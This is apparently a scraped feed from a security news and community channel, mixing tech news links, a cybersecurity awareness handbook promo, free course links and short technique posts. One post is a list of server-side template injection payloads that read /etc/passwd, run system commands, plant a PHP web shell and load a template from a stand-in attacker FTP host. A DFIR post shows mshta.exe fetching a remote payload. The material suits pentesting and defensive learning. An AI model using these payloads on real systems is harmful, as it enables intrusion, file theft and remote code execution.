🔐 Typosquatting Attacks Target Popular npm Packages

https://undercodenews.com/typosquatting-attacks-target-popular-npm-packages/

@Undercode_News

🛠️ #Windows 11 Slowdown? Quick Fixes for a Smoother Experience

https://undercodenews.com/windows-11-slowdown-quick-fixes-for-a-smoother-experience/

@Undercode_News

🦑Master Cybersecurity Awareness: Protect Yourself in the Digital World!

In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether you’re an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.

📖 The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Here’s what it covers:

🔐 Key Insights in the Handbook

1️⃣ Understanding Cyber Threats
• Learn about phishing, ransomware, malware, and social engineering attacks.
• Understand how attackers exploit vulnerabilities in systems and human behavior.

2️⃣ Building Strong Cyber Defenses
• Create robust passwords and implement multi-factor authentication (MFA).
• Discover the importance of regular software updates and patch management.

3️⃣ Safe Online Practices
• Tips for secure online shopping and social media usage.
• Identifying fake websites and avoiding harmful downloads.

4️⃣ Incident Response Plans
• Step-by-step guidance on responding to data breaches or system compromises.
• Learn about reporting cybercrimes and recovering from attacks.

5️⃣ Empowering Your Workplace
• Tips for creating a cybersecurity culture in professional environments.
• How employees can become the first line of defense against cyber threats.

💡 Why You Need This Handbook
• Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
• Actionable Tips: Practical steps to implement immediately for better security.
• Comprehensive Knowledge: From basic concepts to advanced strategies, it’s all here.

🛡 Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

⚡️ #Google #Chrome's New Tab Trick: Archiving Duplicates on #Android

https://undercodenews.com/google-chromes-new-tab-trick-archiving-duplicates-on-android/

@Undercode_News

How Hackers Exploit RDP Proxies in Sophisticated MiTM Attacks

🦑 Secure Code Review Challenge 16:

The goal of this challenge is to pop a shell 🐚 and then provide concrete code-level remediation guidance on how to fix the vulnerability.

You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.

Ref: Florian WalterFlorian Walter
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🖥️ Informative #NASA Successfully Tests SLS Launch Control System

https://undercodenews.com/informative-nasa-successfully-tests-sls-launch-control-system/

@Undercode_News

🦑How Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?

Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:

IDOR in Password Reset

Password Reset Poisoning

Mass Assignment

OAuth Misconfigurations

Improper Rate-Limit Checks etc...........

Ref: AMIT KUMAR
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE courses to boost your skills! 📈

1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h

Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Windows 11 24H2: A Buggy Mess?

https://undercodenews.com/windows-11-24h2-a-buggy-mess/

@Undercode_News

🦑New SSTI (Server Side Template Injection) - Payloads

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Bridging the #Digital Divide: The Future of Identity Verification

https://undercodenews.com/bridging-the-digital-divide-the-future-of-identity-verification/

@Undercode_News

🦑 LOLbins attacks :

mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.

During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.

The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.

Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.

Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:

1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.

Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"

hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows

Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Two Cosmonauts Embark on Busy Spacewalk to Enhance Space Station Capabilities

https://undercodenews.com/two-cosmonauts-embark-on-busy-spacewalk-to-enhance-space-station-capabilities/

@Undercode_News

🎮 The Evolution of #Gaming Laptops: From Bulky Beasts to Sleek Powerhouses

https://undercodenews.com/the-evolution-of-gaming-laptops-from-bulky-beasts-to-sleek-powerhouses/

@Undercode_News

𝐒𝐀𝐌𝐀 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐀𝐮𝐝𝐢𝐭 𝐂𝐡𝐞𝐜𝐤𝐥𝐢𝐬𝐭

🔴 WhoDB, Critical DoS Vulnerability (#CVE-TBD)

https://dailycve.com/whodb-critical-dos-vulnerability-cve-tbd/

@DailyCVE

🔵 Astro, Source Map Disclosure (Low)

https://dailycve.com/astro-source-map-disclosure-low/

@Daily_CVE